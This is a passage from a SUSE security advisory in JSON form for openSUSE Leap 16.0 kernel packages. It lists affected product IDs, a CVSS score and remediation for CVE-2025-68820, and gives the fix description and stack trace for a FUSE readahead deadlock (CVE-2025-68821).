"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-68821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix readahead reclaim deadlock\n\nCommit e26ee4efbc79 (\"fuse: allocate ff-\u003erelease_args only if release is\nneeded\") skips allocating ff-\u003erelease_args if the server does not\nimplement open. However in doing so, fuse_prepare_release() now skips\ngrabbing the reference on the inode, which makes it possible for an\ninode to be evicted from the dcache while there are inflight readahead\nrequests. This causes a deadlock if the server triggers reclaim while\nservicing the readahead request and reclaim attempts to evict the inode\nof the file being read ahead. Since the folio is locked during\nreadahead, when reclaim evicts the fuse inode and fuse_evict_inode()\nattempts to remove all folios associated with the inode from the page\ncache (truncate_inode_pages_range()), reclaim will block forever waiting\nfor the lock since readahead cannot relinquish the lock because it is\nitself blocked in reclaim:\n\n\u003e\u003e\u003e stack_trace(1504735)\n folio_wait_bit_common (mm/filemap.c:1308:4)\n folio_lock (./include/linux/pagemap.h:1052:3)\n truncate_inode_pages_range (mm/truncate.c:336:10)\n fuse_evict_inode (fs/fuse/inode.c:161:2)\n evict (fs/inode.c:704:3)\n dentry_unlink_inode (fs/dcache.c:412:3)\n __dentry_kill (fs/dcache.c:615:3)\n shrink_kill (fs/dcache.c:1060:12)\n shrink_dentry_list (fs/dcache.c:1087:3)\n prune_dcache_sb (fs/dcache.c:1168:2)\n super_cache_scan (fs/super.c:221:10)\n do_shrink_slab (mm/shrinker.c:435:9)\n shrink_slab (mm/shrinker.c:626:10)\n shrink_node (mm/vmscan.c:5951:2)\n shrink_zones (mm/vmscan.c:6195:3)\n do_try_to_free_pages (mm/vmscan.c:6257:3)\n do_swap_page (mm/memory.c:4136:11)\n handle_pte_fault (mm/memory.c:5562:10)\n handle_mm_fault (mm/memory.c:5870:9)\n do_user_addr_fault (arch/x86/mm/fault.c:1338:10)\n handle_page_fault (arch/x86/mm/fault.c:1481:3)\n exc_page_fault (arch/x86/mm/fault.c:1539:2)\n asm_exc_page_fault+0x22/0x27\n\nFix this deadlock by allocating ff-\u003erelease_args and grabbing the\nreference on the inode when preparing the file for release even if the\nserver does not implement open. The inode reference will be dropped when\nthe last reference on the fuse file is dropped (see fuse_file_put() -\u003e\nfuse_release_end()).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
